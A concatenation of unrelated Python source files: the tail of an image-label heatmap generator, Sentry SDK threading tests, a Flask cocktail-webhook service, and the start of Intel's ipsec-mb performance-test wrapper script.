return mask
orth_vector_new_length = ((heat_radius/np.sqrt(np.sum(orth_vector**2)))*orth_vector).round().astype(np.int)
discrete_line, orth_vector_new_length
orth_lines = []
# TODO MAKE FAST
for line_p in discrete_line:
orth_line = np.array(list(zip(*line(*line_p, *(line_p+orth_vector_new_length)))))
orth_lines.append(np.concatenate((orth_line,np.linspace(1,0,len(orth_line))[:,None]),axis=1))
orth_line = np.array(list(zip(*line(*line_p, *(line_p-orth_vector_new_length)))))
orth_lines.append(np.concatenate((orth_line,np.linspace(1,0,len(orth_line))[:,None]),axis=1))
orth_lines = np.vstack(orth_lines)
aa = orth_lines[:,0:2] > -1
bb = orth_lines[:,0:2] < mask.shape[0]
valid_idx = np.logical_and(np.logical_and(aa[:,0], aa[:,1]), np.logical_and(bb[:,0], bb[:,1]))
mask[orth_lines[valid_idx,1].astype(np.int),orth_lines[valid_idx,0].astype(np.int)] = orth_lines[valid_idx,2]
kernel = np.ones((3,3),np.uint8)
dilation = cv2.dilate(mask,kernel,iterations = 3)
close = cv2.erode(dilation,kernel,iterations = 3)
return close
#self.fill_holes(orth_lines[valid_idx], mask)
#except:
#pdb.set_trace()
def make_polygonal_heatmap(self,points, close, heat_radius):
heatmap = np.zeros((self.__target_size,self.__target_size), dtype=np.float)
if len(points) == 0:
return heatmap.astype(np.uint8)
for s in np.arange(1,len(points)):
p1 = np.array([points[s-1][0], points[s-1][1]]).round().astype(np.int)
p2 = np.array([points[s][0], points[s][1]]).round().astype(np.int)
'''
if (p1[0]+(heat_radius*2)>heatmap.shape[1]-1) or (p1[1]+(heat_radius*2)>heatmap.shape[0]-1) or (p2[0]+(heat_radius*2)>heatmap.shape[1]-1) or (p2[1]+(heat_radius*2)>heatmap.shape[0]-1):
continue
if (p1[0]-(heat_radius*2)<0) or (p1[1]-(heat_radius*2)<0) or (p2[0]-(heat_radius*2)<0) or (p2[1]-(heat_radius*2)<0):
continue
'''
heatmap = self.make_line_heat(p1,p2,heatmap, heat_radius)
if close:
p1 = np.array([points[-1][0], points[-1][1]]).round().astype(np.int)
p2 = np.array([points[0][0], points[0][1]]).round().astype(np.int)
'''
if (p1[0]+(heat_radius*2)>heatmap.shape[1]-1) or (p1[1]+(heat_radius*2)>heatmap.shape[0]-1) or (p2[0]+(heat_radius*2)>heatmap.shape[1]-1) or (p2[1]+(heat_radius*2)>heatmap.shape[0]-1):
if heatmap.max() == 0.0:
return heatmap.astype(np.uint8)
else:
return np.round(np.interp(heatmap, (heatmap.min(), heatmap.max()), (0, 255))).astype(np.uint8)
if (p1[0]-(heat_radius*2)<0) or (p1[1]-(heat_radius*2)<0) or (p2[0]-(heat_radius*2)<0) or (p2[1]-(heat_radius*2)<0):
if heatmap.max() == 0.0:
return heatmap.astype(np.uint8)
else:
return np.round(np.interp(heatmap, (heatmap.min(), heatmap.max()), (0, 255))).astype(np.uint8)
'''
heatmap = self.make_line_heat(p1,p2,heatmap, heat_radius)
if heatmap.max() == 0.0:
return heatmap.astype(np.uint8)
return np.round(np.interp(heatmap, (heatmap.min(), heatmap.max()), (0, 255))).astype(np.uint8)
def make_points_heatmap(self,points, heat_radius):
heatmap = np.zeros((self.__target_size,self.__target_size), dtype=np.float32)
if len(points) == 0:
return heatmap.astype(np.uint8)
for pt in points:
heatmap = self.make_point_heat([pt[0], pt[1]],self.__target_size, heat_radius, heatmap)
return np.round(np.interp(heatmap, (heatmap.min(), heatmap.max()), (0, 255))).astype(np.uint8)
def write_image(self,img,path,file, is_gray=False):
if not is_gray:
img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)
return cv2.imwrite(str(path/file), img)
def check_label(self,label_data):
for key in label_data.keys():
if len(label_data[key]) == 0:
return True
if label_data[key].min() < 0:
return False
return True
    def new_process(self,labels):
        """Convert each label entry into per-feature heatmap and mask images,
        an optional convex hull, optional painted debug images and the final
        resized image — all written under root_path."""
        dilate_kernel = np.ones((5,5),np.uint8)
        count = len(labels)
        pbar = progress_bar(range(len(labels)))
        for idx in pbar:
            label = labels[idx]
            # get labels
            label_data,label_types, heat_radiuses = get_labels(label, self.__features)
            if not self.check_label(label_data):
                continue
            # get file name TODO: set file name to extern function
            file = self.__file_name_function(label, self.__image_ext)
            # load image and convert to rgb; skip labels without an image file
            filen = self.__root_path/self.__img_path/file
            if not filen.exists():
                continue
            print(filen)
            img = cv2.imread(str(filen))
            img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)
            for scale in self.__scales:
                try:
                    sized_image_file = file[:file.find("."+self.__image_ext)]+"_sized_"+str(scale)+".png"
                    #zoom images
                    zoomed_label_data, img_zoomed = self.zoom_image(label_data,img, scale)
                    # square images
                    squared_label_data,img_squared = self.square_image(zoomed_label_data, img_zoomed)
                    # size images
                    sized_label_data,img_sized = self.size_image(squared_label_data, img_squared)
                except:
                    # Best-effort: any geometry failure skips this image/scale pair.
                    print("Skip", file)
                    continue
                # make heatmaps
                heatmaps = []
                for asset_key in sized_label_data.keys():
                    points = sized_label_data[asset_key]
                    if len(points) > 0:
                        if (label_types[asset_key] == "polygon"):
                            heatmap = self.make_polygonal_heatmap(points,True, heat_radiuses[asset_key])
                        elif (label_types[asset_key] == "line"):
                            heatmap = self.make_polygonal_heatmap(points,False, heat_radiuses[asset_key])
                        elif label_types[asset_key] == "point":
                            heatmap = self.make_points_heatmap(points, heat_radiuses[asset_key])
                        else:
                            # NOTE(review): raising a plain string is a TypeError at
                            # runtime — should be a proper exception type.
                            raise("label_type `"+label_types[asset_key]+"` not implemented yet.")
                    else:
                        heatmap = np.zeros((self.__target_size,self.__target_size), dtype=np.uint8)
                    # A fully saturated map carries no signal; blank it out.
                    if heatmap.min() == 255:
                        heatmap = np.zeros((self.__target_size,self.__target_size), dtype=np.uint8)
                    self.write_image(heatmap,self.__root_path/asset_key, sized_image_file, is_gray=True)
                    # make mask (dilated binary version of the heatmap)
                    mask = heatmap>0
                    if mask.max() == False:
                        interpolated = np.zeros((mask.shape[0],mask.shape[1]), dtype=np.uint8)
                    else:
                        dilated = cv2.dilate(mask.astype(np.uint8),dilate_kernel,iterations = self.mask_dilation)
                        interpolated = np.round(np.interp(dilated, (dilated.min(), dilated.max()), (0, 255))).astype(np.uint8)
                    self.write_image(interpolated,self.__root_path/asset_key, Path(sized_image_file).stem + "_mask.png", is_gray=True)
                    if asset_key in self.__convex_hull_features:
                        heatmaps.append(heatmap)
                # make convex hull over the configured features' heatmaps
                if len(heatmaps) > 0:
                    combined_mask = np.logical_or.reduce(np.stack(heatmaps))
                    if combined_mask.max() == False:
                        interpolated = np.zeros((combined_mask.shape[0],combined_mask.shape[1]), dtype=np.uint8)
                    else:
                        hull = convex_hull_image(combined_mask)
                        dilated = cv2.dilate(hull.astype(np.uint8),dilate_kernel,iterations = 3)
                        interpolated = np.round(np.interp(dilated, (dilated.min(), dilated.max()), (0, 255))).astype(np.uint8)
                    self.write_image(interpolated,self.__root_path/self.__hull_path, sized_image_file, is_gray=True)
                # paint images (debug: draw every labelled point)
                if self.__painted_images_path is not None:
                    img_sized_paint = img_sized.copy()
                    for key in sized_label_data.keys():
                        points = sized_label_data[key]
                        for pt in points:
                            img_sized_paint = cv2.circle(img_sized_paint, tuple(pt),1,(255,0,0),2)
                    self.write_image(img_sized_paint,self.__root_path/self.__painted_images_path, sized_image_file, is_gray=False)
                # save final image
                if self.__save_output_img:
                    if self.__process_output_image is not None:
                        img_sized = self.__process_output_image(img_sized, sized_image_file)
                        # NOTE(review): processed output is written with is_gray=True — confirm intended.
                        self.write_image(img_sized, self.__root_path/self.__final_images_path, sized_image_file, is_gray=True)
                    else:
                        self.write_image(img_sized, self.__root_path/self.__final_images_path, sized_image_file, is_gray=False)
                pbar.comment = sized_image_file
|
test_threading.py
|
import gc
from threading import Thread
import pytest
from sentry_sdk import configure_scope, capture_message
from sentry_sdk.integrations.threading import ThreadingIntegration
@pytest.mark.parametrize("integrations", [[ThreadingIntegration()], []])
def test_handles_exceptions(sentry_init, capture_events, integrations):
    """A crash inside a thread is reported only when the integration is on."""
    sentry_init(default_integrations=False, integrations=integrations)
    events = capture_events()

    worker = Thread(target=lambda: 1 / 0)
    worker.start()
    worker.join()

    if not integrations:
        # Without ThreadingIntegration nothing must be captured.
        assert not events
        return

    (event,) = events
    (exc,) = event["exception"]["values"]
    assert exc["type"] == "ZeroDivisionError"
    assert exc["mechanism"] == {"type": "threading", "handled": False}
@pytest.mark.parametrize("propagate_hub", (True, False))
def test_propagates_hub(sentry_init, capture_events, propagate_hub):
    """Scope data from a parent thread reaches child-thread events iff
    ``propagate_hub`` is enabled."""
    sentry_init(
        default_integrations=False,
        integrations=[ThreadingIntegration(propagate_hub=propagate_hub)],
    )
    events = capture_events()

    def inner():
        1 / 0

    def outer():
        with configure_scope() as scope:
            scope.set_tag("stage1", True)

        child = Thread(target=inner)
        child.start()
        child.join()

    parent = Thread(target=outer)
    parent.start()
    parent.join()

    (event,) = events
    (exc,) = event["exception"]["values"]
    assert exc["type"] == "ZeroDivisionError"
    assert exc["mechanism"] == {"type": "threading", "handled": False}

    if propagate_hub:
        assert event["tags"]["stage1"] is True
    else:
        assert "stage1" not in event.get("tags", {})
def test_circular_references(sentry_init, request):
    """The patched Thread must not create uncollectable reference cycles."""
    sentry_init(default_integrations=False, integrations=[ThreadingIntegration()])

    # Start from a clean slate and keep the collector off for the check.
    gc.collect()
    gc.disable()
    request.addfinalizer(gc.enable)

    class NoopThread(Thread):
        def run(self):
            pass

    worker = NoopThread()
    worker.start()
    worker.join()
    del worker

    # Zero collected objects means no cycle was created by the patching.
    assert not gc.collect()
def test_double_patching(sentry_init, capture_events):
    """Each crashing thread yields exactly one event (no double reporting)."""
    sentry_init(default_integrations=False, integrations=[ThreadingIntegration()])
    events = capture_events()

    # XXX: Workaround for race condition in the py library's magic import
    # system (py is a dependency of pytest)
    capture_message("hi")
    del events[:]

    class CrashingThread(Thread):
        def run(self):
            1 / 0

    workers = []
    for _ in range(10):
        worker = CrashingThread()
        worker.start()
        workers.append(worker)
    for worker in workers:
        worker.join()

    assert len(events) == 10
    for event in events:
        (exc,) = event["exception"]["values"]
        assert exc["type"] == "ZeroDivisionError"
|
app.py
|
#!flask/bin/python
import os
import datetime
import logging
import json
from threading import Thread
from typing import Dict
import requests
from dotenv import load_dotenv
from flask import Flask, request, abort, jsonify
from querry_sender import try_send_querry_data
from email_sender import send_mail
from database import DatabaseHandler
from helper import generate_headers_and_urls
# Load .env configuration before the app reads any environment variables.
load_dotenv()
app = Flask(__name__)
logging.basicConfig(level=logging.INFO)
@app.route("/")
def welcome():
    """Health-check endpoint confirming that the API is reachable."""
    status_payload = {"status": "api working"}
    return jsonify(status_payload)
@app.route("/hookhandler/cocktail", methods=["POST"])
def post_cocktail_hook():
    """Fan the posted cocktail data out to every configured webhook.

    Validates the incoming JSON, builds the payload, and posts it to each
    target URL in its own thread so this request returns immediately.
    Returns 201 once the worker threads have been started, 400 on bad input.
    """

    def post_to_hook(url: str, payload: str, headers: Dict, send_querry: bool):
        """Post *payload* to *url*; persist it for retry on connection failure."""
        try:
            req = requests.post(url, data=payload, headers=headers)
            app.logger.info(f"{req.status_code}: Posted to {url} with payload: {payload}")
            # Check if there is still querries data which was not send previously
            # Needs to be specified to send, since multiple threads would cause double sending
            if send_querry:
                try_send_querry_data(app)
        except requests.exceptions.ConnectionError:
            app.logger.error(f"Could not connect to {url} for the cocktail data!")
            db_handler = DatabaseHandler()
            db_handler.save_failed_post(payload, url)
        # pylint: disable=broad-except
        except Exception as err:
            app.logger.error(f"Some other error occured: {err}")

    # Validate every field used below; previously only "cocktailname" was
    # checked, so a missing "volume"/"machinename"/"countrycode" raised a
    # KeyError and produced an HTTP 500 instead of a 400.
    required_fields = ("cocktailname", "volume", "machinename", "countrycode")
    if not request.json or any(field not in request.json for field in required_fields):
        abort(400)
    cocktail = {field: request.json[field] for field in required_fields}
    cocktail["makedate"] = datetime.datetime.now().strftime("%d/%m/%Y, %H:%M")

    headers, urls = generate_headers_and_urls()
    payload = json.dumps(cocktail)
    for pos, url in enumerate(urls):
        # Only the first worker retries previously failed posts (avoids duplicates).
        send_querry = pos == 0
        thread = Thread(target=post_to_hook, args=(url, payload, headers, send_querry,))
        thread.start()
    return jsonify({"text": "Post to cocktail webhook started"}), 201
@app.route("/email", methods=["POST"])
def post_file_with_mail():
    """Forward the uploaded file per email and report the outcome."""
    uploaded = request.files["upload_file"]
    response_text = send_mail(uploaded.filename, uploaded)
    app.logger.info(response_text)
    return jsonify({"text": response_text}), 200
if __name__ == "__main__":
    # Retry any webhook posts that failed while the service was down,
    # then start the development server on the configured port.
    try_send_querry_data(app)
    app.run(host="0.0.0.0", port=os.getenv("PORT"))
|
ipsec_perf_tool.py
|
#!/usr/bin/env python3
"""
**********************************************************************
Copyright(c) 2021, Intel Corporation All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name of Intel Corporation nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**********************************************************************
"""
import threading
import queue
import os
import sys
import subprocess
import platform
import time
import argparse
import textwrap
# number of variants to run (incremented as variants are enqueued in main())
TOTAL_VARIANTS = 0
# dictionary of env vars passed to each perf subprocess; set by init_global_vars()
ENVS = None
# queues to store todo and completed variants; set by init_global_vars()
TODO_Q = None
DONE_Q = None
# don't output info to stderr if set
QUIET = False
# perf application name (platform dependent); set by init_global_vars()
PERF_APP = ''
# exit on error flag, shared by all worker threads
EXIT_ERROR = False
class Variant:
    """Class to setup and run a single test case variant.

    The constructor translates its keyword arguments into the perf app
    command line; run() executes that command and stores its output.
    """

    def __init__(self, idx=None, arch=None, direction='encrypt', cipher_alg=None,
                 hash_alg=None, aead_alg=None, sizes=None, offset=None,
                 cold_cache=False, shani_off=False, gcm_job_api=False,
                 unhalted_cycles=False, quick_test=False, smoke_test=False,
                 imix=None, aad_size=None, job_iter=None):
        """Build perf app command line"""
        global PERF_APP
        self.idx = idx
        self.arch = arch
        self.direction = direction
        self.cipher_alg = cipher_alg
        self.hash_alg = hash_alg
        self.aead_alg = aead_alg
        self.sizes = sizes
        self.offset = offset
        self.cmd = '{} --no-progress-bar '.format(PERF_APP)
        self.cmd_output = ''
        self.out = []
        self.core = None
        self.cold_cache = cold_cache
        self.shani_off = shani_off
        self.gcm_job_api = gcm_job_api
        self.unhalted_cycles = unhalted_cycles
        self.quick_test = quick_test
        self.smoke_test = smoke_test
        self.imix = imix
        self.aad_size = aad_size
        self.job_iter = job_iter

        if self.arch is not None:
            self.cmd += ' --arch {}'.format(self.arch)
        if self.offset is not None:
            self.cmd += ' -o {}'.format(self.offset)
        # aead algorithms are mutually exclusive with cipher/hash ones
        if self.aead_alg is not None:
            if self.cipher_alg is not None or \
                    self.hash_alg is not None:
                print("Invalid combination: aead + cipher / hash",
                      file=sys.stderr)
                sys.exit(1)
            self.cmd += ' --aead-algo {}'.format(self.aead_alg)
        if self.cipher_alg is not None:
            if self.aead_alg is not None:
                print("Invalid combination: aead + cipher", file=sys.stderr)
                sys.exit(1)
            self.cmd += ' --cipher-algo {}'.format(self.cipher_alg)
        if self.hash_alg is not None:
            if self.aead_alg is not None:
                print("Invalid combination: aead + hash", file=sys.stderr)
                sys.exit(1)
            self.cmd += ' --hash-algo {}'.format(self.hash_alg)
        # direction only applies when something is encrypted/decrypted
        if self.cipher_alg is not None or \
                self.aead_alg is not None:
            self.cmd += ' --cipher-dir {}'.format(self.direction)
        if self.sizes is not None:
            self.cmd += ' --job-size {}'.format(self.sizes)
        if self.cold_cache is True:
            self.cmd += ' -c'
        if self.shani_off is True:
            self.cmd += ' --shani-off'
        if self.gcm_job_api is True:
            self.cmd += ' --gcm-job-api'
        if self.unhalted_cycles is True:
            self.cmd += ' --unhalted-cycles'
        if self.quick_test is True:
            self.cmd += ' --quick'
        if self.smoke_test is True:
            self.cmd += ' --smoke'
        if self.imix is not None:
            self.cmd += ' --imix {}'.format(self.imix)
        if self.aad_size is not None:
            self.cmd += ' --aad-size {}'.format(self.aad_size)
        if self.job_iter is not None:
            self.cmd += ' --job-iter {}'.format(self.job_iter)

    def run(self):
        """Run perf app, store its output and return True on success.

        On failure the stderr captured from the failed run is stored.
        (Previously the command was re-executed a second time just to read
        stderr, doubling the runtime of a failing case, and a missing
        binary escaped the bare except and killed the worker thread.)
        """
        try:
            self.cmd_output = \
                subprocess.run(self.cmd.split(),
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE,
                               env=ENVS, check=True).stdout.decode('utf-8')
            return True
        except subprocess.CalledProcessError as err:
            # non-zero exit status: stderr was already captured by check=True
            self.cmd_output = err.stderr.decode('utf-8')
            return False
        except OSError as err:
            # e.g. perf app binary not found or not executable
            self.cmd_output = str(err)
            return False

    def set_core(self, core):
        """Set core to run perf app on (translated to an affinity mask)."""
        self.core = core
        mask = 1 << core
        self.cmd += ' --cores {}'.format(hex(mask))

    def get_output(self):
        """Get output from run"""
        return self.cmd_output

    def get_cmd(self):
        """Get variant command line"""
        return self.cmd

    def get_idx(self):
        """Get assigned index"""
        return self.idx

    def get_info(self):
        """Get a fixed-width, one line summary of the variant."""
        idx = '' if self.idx is None else self.idx
        core = '' if self.core is None else self.core
        direction = 'n/a' if self.direction is None else self.direction
        cipher_alg = '' if self.cipher_alg is None else self.cipher_alg
        aead_alg = '' if self.aead_alg is None else self.aead_alg
        if self.hash_alg is None:
            hash_alg = ''
        elif cipher_alg == '':
            hash_alg = self.hash_alg
        else:
            # combined cipher + hash variant
            hash_alg = ' + ' + self.hash_alg

        alg = '{}{}{}'.format(cipher_alg, hash_alg, aead_alg)
        info = '{0:<5} {1:<4} {2:<6} {3:<7} {4:<40}'\
            .format(idx, core, self.arch, direction, alg)
        return info
def init_global_vars():
    """Initialize the module-level state shared by all worker threads."""
    global TOTAL_VARIANTS
    global ENVS
    global TODO_Q
    global DONE_Q
    global QUIET
    global PERF_APP

    TOTAL_VARIANTS = 0
    QUIET = False

    # make the perf app findable by appending the current dir to PATH
    path = '{}:{}'.format(os.getenv('PATH'), os.getenv('PWD'))

    # fall back to the in-tree library location unless the caller set one
    lib_path = os.getenv('LD_LIBRARY_PATH', '../lib')

    # environment passed to every perf subprocess invocation
    ENVS = {'PATH': path, 'LD_LIBRARY_PATH': lib_path}

    # work queues shared between scheduler threads
    TODO_Q = queue.Queue()
    DONE_Q = queue.Queue()

    # pick the platform specific binary name
    PERF_APP = 'ipsec_perf.exe' if platform.system() == 'Windows' else 'ipsec_perf'
def get_info():
    """Get system and app info from perf app output.

    Runs the perf app with --print-info and extracts the supported
    architectures, the best architecture and the supported algorithm
    lists. Exits the program if any of them cannot be determined.
    """
    archs = None
    best_arch = None
    cipher_algos = None
    hash_algos = None
    aead_algos = None

    # NOTE: the original applied a spurious '.format(type)' to this flag
    cmd = [PERF_APP, '--print-info']
    output = subprocess.run(cmd, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            env=ENVS, check=True).stdout.decode('utf-8')

    lines = output.rstrip().split('\n')
    try:
        for line in lines:
            info = line.split(':')
            if info[0] == 'Supported architectures':
                archs = info[1].split()
            if info[0] == 'Best architecture':
                best_arch = info[1].split()
            if info[0] == 'Supported cipher algorithms':
                cipher_algos = info[1].split()
            if info[0] == 'Supported hash algorithms':
                hash_algos = info[1].split()
            if info[0] == 'Supported aead algorithms':
                aead_algos = info[1].split()
    except IndexError:
        # a line without a ':' separator; report and fall through to the
        # completeness check below
        print("Error parsing --print-info output:\n"
              "{}".format(output), file=sys.stderr)

    if archs is None or best_arch is None or cipher_algos is None \
            or hash_algos is None or aead_algos is None:
        print("Error parsing system and app information", file=sys.stderr)
        sys.exit(1)

    return archs, best_arch, cipher_algos, hash_algos, aead_algos
def parse_cores(core_str):
    """Parse a core list/range passed through the command line.

    Accepts a comma separated list (e.g. "3,4,5", a single core included)
    or an inclusive range (e.g. "2-8") and returns a list of ints.
    """
    # strings are immutable: the original discarded the replace() result,
    # leaving the spaces in place
    core_str = core_str.replace(" ", "")

    # comma separated list (or a single core)
    if '-' not in core_str:
        return list(map(int, core_str.split(',')))

    # parse inclusive range e.g. 2-8
    bounds = core_str.split('-')
    return list(range(int(bounds[0]), int(bounds[1]) + 1))
def parse_results(variants):
    """Merge the per-variant perf app outputs into one table.

    The first column (row labels) is taken from the first variant's
    output; every variant then contributes one value column.
    """
    # header column comes from the first variant's output
    merged = [line.split('\t')[0]
              for line in variants[0].get_output().split('\n')[:-1]]

    # append one result column per variant
    for variant in variants:
        rows = variant.get_output().split('\n')
        for row_idx in range(len(rows) - 1):
            merged[row_idx] += '\t{}'.format(rows[row_idx].split()[1])
    return merged
def parse_args():
    """Parse command line arguments.

    Returns a tuple of all parsed and validated options in the order
    consumed by main(). Also sets the global QUIET flag as a side effect.
    """
    global QUIET
    cores = None
    directions = ['encrypt', 'decrypt']
    offset = 24
    alg_types = ['cipher-only', 'hash-only', 'aead-only', 'cipher-hash-all']

    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,
                                     description="Wrapper script for the ipsec-mb " \
                                     "performance application enabling extended functionality")

    # parse and validate args
    parser.add_argument("-a", "--arch", choices=['SSE', 'AVX', 'AVX2', 'AVX512'],
                        default=None, action='append',
                        help="set architecture to test (default tests all supported archs)")
    parser.add_argument("-c", "--cores", default=cores,
                        help="list/range of cores e.g. 2-8 or 3,4,5")
    parser.add_argument("-d", "--direction", default=None,
                        choices=directions, help="Cipher direction")
    parser.add_argument("-o", "--offset", default=offset, type=int,
                        help="offset for the SHA size increment, default is 24")
    parser.add_argument("-t", "--alg-type", default=None, action='append', choices=alg_types,
                        help="algorithm types to test")
    parser.add_argument("-s", "--job-size", default=None,
                        help=textwrap.dedent('''\
                        size of the cipher & hash job in bytes.
                        It can be:
                        - single value: test single size
                        - list: test multiple sizes separated by commas
                        - range: test multiple sizes with following format
                        min:step:max (e.g. 16:16:256)\n'''))
    parser.add_argument("-q", "--quiet", default=False, action='store_true',
                        help="disable verbose output")
    parser.add_argument("--cold-cache", default=False, action='store_true',
                        help="use cold cache, it uses warm as default")
    parser.add_argument("--arch-best", action='store_true',
                        help="detect available architectures and run only on the best one")
    parser.add_argument("--shani-off", action='store_true', help="don't use SHA extensions")
    parser.add_argument("--gcm-job-api", action='store_true',
                        help="use JOB API for GCM perf tests (raw GCM API is default)")
    parser.add_argument("--unhalted-cycles", action='store_true',
                        help=textwrap.dedent('''\
                        measure using unhalted cycles (requires root).
                        Note: RDTSC is used by default'''))
    parser.add_argument("--quick", action='store_true',
                        help=textwrap.dedent('''\
                        reduces number of test iterations by x10
                        (less precise but quicker)'''))
    parser.add_argument("--smoke", action='store_true',
                        help=textwrap.dedent('''\
                        very quick, imprecise and without print out
                        (for validation only)'''))
    parser.add_argument("--imix", default=None,
                        help=textwrap.dedent('''\
                        set numbers that establish occurrence proportions between packet sizes.
                        It requires a list of sizes through --job-size.
                        (e.g. --imix 4,6 --job-size 64,128 will generate
                        a series of job sizes where on average 4 out of 10
                        packets will be 64B long and 6 out of 10 packets
                        will be 128B long)'''))
    parser.add_argument("--aad-size", default=None, type=int,
                        help="size of AAD for AEAD algorithms")
    parser.add_argument("--job-iter", default=None, type=int,
                        help="number of tests iterations for each job size")

    args = parser.parse_args()

    # validate and convert values where necessary
    if args.arch is not None and args.arch_best is True:
        print("{}: error: argument -a/--arch cannot be used with " \
              "--arch-best".format(sys.argv[0]), file=sys.stderr)
        sys.exit(1)

    if args.cores is not None:
        try:
            cores = parse_cores(args.cores)
        except:
            print("{}: error: argument -c/--cores: invalid value " \
                  "{}".format(sys.argv[0], args.cores), file=sys.stderr)
            sys.exit(1)

    if args.imix is not None and args.job_size is None:
        print("{}: error: argument --imix must be used with " \
              "--job-size".format(sys.argv[0]), file=sys.stderr)
        sys.exit(1)

    if args.alg_type is not None:
        alg_types = args.alg_type
    else:
        # strip all cipher hash combinations in default run
        alg_types = alg_types[:-1]

    if args.direction is not None:
        directions = [args.direction]

    if args.quiet is True:
        QUIET = True

    return args.arch, cores, directions, args.offset, \
        alg_types, args.job_size, args.cold_cache, args.arch_best, \
        args.shani_off, args.gcm_job_api, args.unhalted_cycles, \
        args.quick, args.smoke, args.imix, \
        args.aad_size, args.job_iter
def run_test(core=None):
    """
    Main processing thread function

    1. Dequeue variants from todo queue until empty
    2. Run performance test for variant
    3. Place completed variants in completed (done) queue

    :param core: optional core number to pin the perf app to
    """
    global QUIET
    global TODO_Q
    global DONE_Q
    global EXIT_ERROR

    while TODO_Q.empty() is False:
        variant = TODO_Q.get()

        # skip if error encountered (another worker already failed; drain the
        # queue so TODO_Q.join() in main() can return)
        if EXIT_ERROR is True:
            if QUIET is False:
                print('{} {}'.format(variant.get_info(), '...skipped'), file=sys.stderr)
            TODO_Q.task_done()
            continue

        # set core if specified
        if core is not None:
            variant.set_core(core)

        # print variant information
        if QUIET is False:
            print(variant.get_info(), file=sys.stderr)

        # run variant; on failure flag all workers to skip remaining work
        if variant.run() is False:
            print('Error encountered running: {}\nOutput:\n{}'\
                  .format(variant.get_cmd(),
                          variant.get_output()),
                  file=sys.stderr)
            EXIT_ERROR = True

        DONE_Q.put(variant)
        TODO_Q.task_done()
def main():
    """
    Main function to:
    - parse command line args
    - generate and enqueue list of variants to run
    - schedule variants across selected cores
    - post process results and print to stdout
    """
    global TOTAL_VARIANTS
    global QUIET
    global TODO_Q
    global DONE_Q
    global EXIT_ERROR

    header = '\n{0:<5} {1:<4} {2:<6} {3:<7} {4:<40}'\
        .format('NO', 'CORE', 'ARCH', 'DIR', 'ALG')
    result = [] # list to store parsed results

    # init global vars
    init_global_vars()

    # query the perf app for what this build/system supports
    supported_archs, best_arch, cipher_algos, hash_algos, aead_algos = get_info()

    # parse command line args
    archs, cores, directions, offset, alg_types, sizes, cold_cache, arch_best, \
        shani_off, gcm_job_api, unhalted_cycles, quick_test, smoke_test, \
        imix, aad_size, job_iter = parse_args()

    # validate requested archs are supported
    if arch_best is True:
        archs = best_arch
    elif archs is None:
        archs = supported_archs
    else:
        for arch in archs:
            if arch not in supported_archs:
                print('Error: {} arch not supported!'.format(arch), file=sys.stderr)
                sys.exit(1)

    # print args
    if QUIET is False:
        print('Testing:', file=sys.stderr)
        print(' Architectures: {}'.format(archs), file=sys.stderr)
        print(' Algorithms: {}'.format(alg_types), file=sys.stderr)
        print(' Directions: {}'.format(directions), file=sys.stderr)
        if offset is not None:
            print(' Offset: {}'.format(offset), file=sys.stderr)
        if aad_size is not None:
            print(' AAD size: {}'.format(aad_size), file=sys.stderr)
        if sizes is not None:
            print(' Sizes: {}'.format(sizes), file=sys.stderr)
        if imix is not None:
            print(' IMIX: {}'.format(imix), file=sys.stderr)
        if cores is not None:
            print(' Cores: {}'.format(cores), file=sys.stderr)
        print(' Cache: {}'.format("cold" if cold_cache else "warm"), file=sys.stderr)
        print(' SHANI: {}'.format("off" if shani_off else "on"), file=sys.stderr)
        print(' GCM API: {}'.format("job" if gcm_job_api else "direct"), file=sys.stderr)
        print(' Measuring using {}'.format("unhalted cycles" if unhalted_cycles \
            else "rdtsc"), file=sys.stderr)
        if quick_test is True or smoke_test is True:
            print(' Test type: {}'.format("smoke" if smoke_test else "quick"), file=sys.stderr)
        if job_iter is not None:
            print(' Job iterations: {}'.format(job_iter), file=sys.stderr)
        print(header, file=sys.stderr)

    # fill todo queue with variants to test
    for arch in archs:
        if 'cipher-only' in alg_types:
            for direction in directions:
                for cipher_alg in cipher_algos:
                    # skip low performing ciphers for now
                    if 'des' in cipher_alg or 'kasumi' in cipher_alg:
                        continue
                    TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=direction,
                                       offset=offset, sizes=sizes, cipher_alg=cipher_alg,
                                       cold_cache=cold_cache, shani_off=shani_off,
                                       gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
                                       quick_test=quick_test, smoke_test=smoke_test, imix=imix,
                                       aad_size=aad_size, job_iter=job_iter))
                    TOTAL_VARIANTS += 1

        if 'hash-only' in alg_types:
            # skip direction for hash only algs
            for hash_alg in hash_algos:
                # skip low performing algorithms for now
                if 'kasumi' in hash_alg:
                    continue
                TODO_Q.put(Variant(idx=TOTAL_VARIANTS, arch=arch, direction=None,
                                   offset=offset, sizes=sizes, hash_alg=hash_alg,
                                   cold_cache=cold_cache, shani_off=shani_off,
                                   gcm_job_api=gcm_job_api, unhalted_cycles=unhalted_cycles,
